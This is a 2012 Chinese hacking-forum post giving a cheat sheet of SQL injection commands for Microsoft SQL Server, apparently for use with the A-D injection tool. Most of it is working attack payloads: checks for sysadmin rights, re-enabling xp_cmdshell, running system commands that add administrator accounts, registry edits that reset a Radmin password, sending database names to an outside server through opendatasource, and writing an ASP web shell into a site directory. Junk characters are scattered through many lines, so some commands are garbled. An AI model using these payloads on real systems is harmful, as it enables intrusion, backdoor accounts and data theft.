找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1984|回复: 0
打印 上一主题 下一主题

阿D常用的一些注入命令

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:26:30 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
阿D常用的一些注入命令: K  a$ [3 U/ Q
//看看是什么权限的
9 i1 x8 S, l3 F) ]3 [5 X2 ^and 1=(Select IS_MEMBER('db_owner'))
7 s6 c$ H/ h( X4 y" O: s2 CAnd char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
# H( k2 _9 A, m) [& ~
! h7 M; U/ |6 m! A+ `//检测是否有读取某数据库的权限, L* U, g. y% L
and 1= (Select HAS_DBACCESS('master'))) Y$ {0 v% K3 C6 V' n. h
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --" D" {# Y7 Y) R3 h! x) p% S2 ~
" ~0 D- T9 k5 F( `
  b# _' I. C) E$ J: G8 I
数字类型1 o! S- ~2 w) F3 h' \0 f$ a3 x6 y& j
and char(124)%2Buser%2Bchar(124)=03 p! T& e1 b( ^/ i
7 D- q0 |' S, t5 ~6 z
字符类型% u- }$ d9 A9 G- }' j; o& h
' and char(124)%2Buser%2Bchar(124)=0 and ''='
- X2 p4 P8 k. `$ w* Y1 X9 H5 l4 d9 r8 E- w  u' c) b* N9 |
搜索类型
6 u) n; K( J! T+ u+ @' and char(124)%2Buser%2Bchar(124)=0 and '%'='
  M) i1 y# J' ~2 D1 H
- X8 T  z$ x) F# d7 M: Q爆用户名
+ ~  V+ _- [% R9 D, O/ l8 mand user>0
. ^  \5 f8 ~; B: E+ h' and user>0 and ''=': {- S- o+ k3 D4 W' P5 G5 H2 ?' C
  _6 u( X3 f4 z5 U4 E  U( t" m' `/ }
检测是否为SA权限: H6 |2 q  l5 O9 J2 G* Z# k- S
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
; Z- u3 X$ {8 s% b* h0 LAnd char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
' s' i% n- t  r. q: g) `( y2 ?$ n* X4 r$ \- H3 |
检测是不是MSSQL数据库8 [4 M% G2 R7 p3 c' ]5 x6 ?5 ~
and exists (select * from sysobjects);--
4 y3 Q6 j% K  b5 X' w' f4 O  b. N! d  X
检测是否支持多行! s4 I9 t& I9 L
;declare @d int;-- % b' n' ?6 e% j$ ?7 b

; ?+ F5 v& L( m1 c. A恢复 xp_cmdshell
& {( O# K% E& ]" z4 c& N. f;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
4 g4 T/ Q4 T# U6 y9 r  w$ n
& d0 W! O8 m5 ^
9 k; B7 E* O7 pselect * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
# I: ^, E1 V4 A% O, r
* g+ @. X+ }5 w7 {//-----------------------
+ o3 R4 |8 T8 |7 p" y5 d//      执行命令. y8 T) o+ g4 w6 V) g+ Q
//-----------------------
, _* J2 r. y; h! m首先开启沙盘模式:
( O# u- S3 k3 D& j9 G- hexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1: c- c# Z- V+ }. c- b& G2 F9 O+ A
. A" [8 t. f& `3 N
然后利用jet.oledb执行系统命令0 J6 a$ e# M2 d2 B
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
6 T! g$ S+ \( ^2 @! J- I8 p- B& Y! a# P7 ?' ~
执行命令$ m* H9 S6 }+ T  l
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
, [  P( a5 F( Z$ L  b  x2 j  E. D, Y. T' i& G9 E: D( ~
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'5 `' ?6 q- f5 |7 Q# G; B8 L

# V7 n% k  T9 k; G判断xp_cmdshell扩展存储过程是否存在:+ v- @$ D) ?4 s
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')( f4 l! B+ c2 w3 E: S) C: x# k

, [3 P8 F* y6 ]2 a写注册表
  Z, \; v5 r9 C9 K" l8 xexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
2 t5 g+ |) `- @' B% r. |' P
. o7 x' A7 J  T4 `4 a7 ~- M4 WREG_SZ2 D: Q0 l9 [$ F1 p! E0 A6 F

! A+ w. Q6 r" E1 r( d' ]读注册表
, [- A; C) \# q' ^exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'( p9 N3 I$ P- Q/ @8 l4 Z% |

' E7 ^* a9 R$ u读取目录内容5 M$ [0 d/ [) \, ?
exec master..xp_dirtree 'c:\winnt\system32\',1,1
0 n* H& G( L, A. x  F
7 L8 x' ?. D7 y
: V+ n. W+ \$ B% h数据库备份
. x, f/ D: j# q+ G  _) H5 ebackup database pubs to disk = 'c:\123.bak'! Y/ L+ a, {8 z4 N% h) _, g
6 `4 Y% E$ V$ N2 o. l) x9 k
//爆出长度
8 [& ]2 U* e  I$ ?/ T, B2 bAnd (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
) u' I2 \6 s9 A7 A" B) Z. d# Y; I# Y! I$ f7 r2 c8 u$ p

- t. d" w4 k. [+ b# w0 g) j
$ S8 A# t) N& q' H) h  U3 r更改sa口令方法:用sql综合利用工具连接后,执行命令:
! c9 d% y5 _6 B. lexec sp_password NULL,'新密码','sa'  `) i8 o3 K' q4 y) s
+ k* \& [! s" S! D# q1 S
添加和删除一个SA权限的用户test:1 T6 n' ~! s) l7 {+ A
exec master.dbo.sp_addlogin test,ptlove
, |5 C  K! @6 Q! Wexec master.dbo.sp_addsrvrolemember test,sysadmin2 U9 U' B6 d$ y  t2 M  c' W# P

9 b; c8 S' i  I8 P删除扩展存储过过程xp_cmdshell的语句:
1 ]# E7 y: n0 D& Z% S* zexec sp_dropextendedproc 'xp_cmdshell'
" C6 i* k8 J2 B" y
. X6 R, c2 q* w1 i; b! y  C# {7 ~8 V添加扩展存储过过程
9 T$ k6 j  B/ qEXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
1 f: T9 o6 I, v" A8 E4 dGRANT exec On xp_proxiedadata TO public
9 ]8 K, S0 E; G, n; n: [! ~8 _* ^5 [" J3 j( t$ N5 v

1 t  @( x: k% C1 d停掉或激活某个服务。
2 f6 b# i, a( a* k# b. A8 j
( [; ^5 y3 i# p: sexec master..xp_servicecontrol 'stop','schedule'& m5 x& r1 y  l
exec master..xp_servicecontrol 'start','schedule'  S+ S. `8 G* m, }( _
: }& ^) Z. |' I  e8 r
dbo.xp_subdirs7 ~2 r) J0 j! B0 J+ b+ L, i4 m5 H

! W, ?3 ]4 |7 o  z6 R* z  I. J- V只列某个目录下的子目录。
9 c0 T& Z6 c2 j6 S6 _4 wxp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'7 o1 J% u% v' H
" J* L: p/ o' ?1 J+ ?1 m
dbo.xp_makecab
$ B. Z  n/ u7 O- P/ }) v
  i+ t" b+ @: m+ ~* I, h! v将目标多个档案压缩到某个目标档案之内。
( \' d  e/ E) u1 a5 e. u所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。' B1 N. j7 g! q6 c
. l& S1 Q' _1 v1 J' |4 x2 S
dbo.xp_makecab
1 j8 c- X* ]+ J% C! q'c:\test.cab','mszip',1,8 C8 J8 `, d$ T2 m! @
'C:\Inetpub\wwwroot\SQLInject\login.asp',7 E% ~" J0 Z2 `, {' v
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
# o, ]6 J' k2 \6 _2 W& I3 v0 {. R. h0 {! K9 ]# D& n
xp_terminate_process. X$ ]9 |' r. V) f
7 W9 a" _! o( ~# r- O; I- h# l
停掉某个执行中的程序,但赋予的参数是 Process ID。# k. A/ D  W$ s4 S
利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID* `' O( \$ Y& o, j' |5 {' T/ c

5 B- N* S8 d9 G2 G4 lxp_terminate_process 2484  K  M3 m: i1 H+ k: i6 M- u/ g* [
# `+ i( I6 F9 `5 b8 g8 W' n7 t, I
xp_unpackcab
* q1 E2 W  c( h0 @5 Z* F' n  w0 n! z; b8 P3 A
解开压缩档。; n& T( A. R; [: I+ P1 N

6 ~$ {4 V: D. l6 _9 `xp_unpackcab 'c:\test.cab','c:\temp',1
2 |; Q- E) ^* z& L; E9 N+ ~2 y
* |- `% B# w, h" n& d$ h7 c( r- t# |9 l( [1 n
某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
- c7 Q) D; f' }* @! ^6 Y6 Z$ ~$ N# a+ n4 s
create database lcx;8 l$ e: u/ \' H! @" n  c1 X
Create TABLE ku(name nvarchar(256) null);
4 P$ e& t+ t/ u3 O. |Create TABLE biao(id int NULL,name nvarchar(256) null);( F! H9 D2 W9 V/ ~2 G1 e

7 u4 N, s7 m& L% R6 x% [" P//得到数据库名
# ]# U1 O' a3 {3 Iinsert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases3 ]1 f2 K& x# E( B7 {( Y0 d

4 f& k/ X4 K, ~" Q% V9 h! Q+ J& A- d- i- {+ J: R: K, V
//在Master中创建表,看看权限怎样0 n" t* f% `9 Y$ ^- r. ?( C5 v; y
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
" A6 E( \  a& I0 s, {7 v
0 e: z) ]+ Z! k; E  y# `3 r用 sp_makewebtask直接在web目录里写入一句话马:
' L$ D6 q- J) Fhttp://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
5 H& b+ a+ g% D6 O0 D4 l' C
" S  o, h0 ?1 v6 q' j1 M3 |//更新表内容* ^: s$ y6 R; D. N
Update films SET kind = 'Dramatic' Where id = 1239 I  }/ Q3 U4 @- t

3 G: o* I% _& c% O7 M1 I: f//删除内容
* e( A; ^, g$ k6 hdelete from table_name where Stockid = 3
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表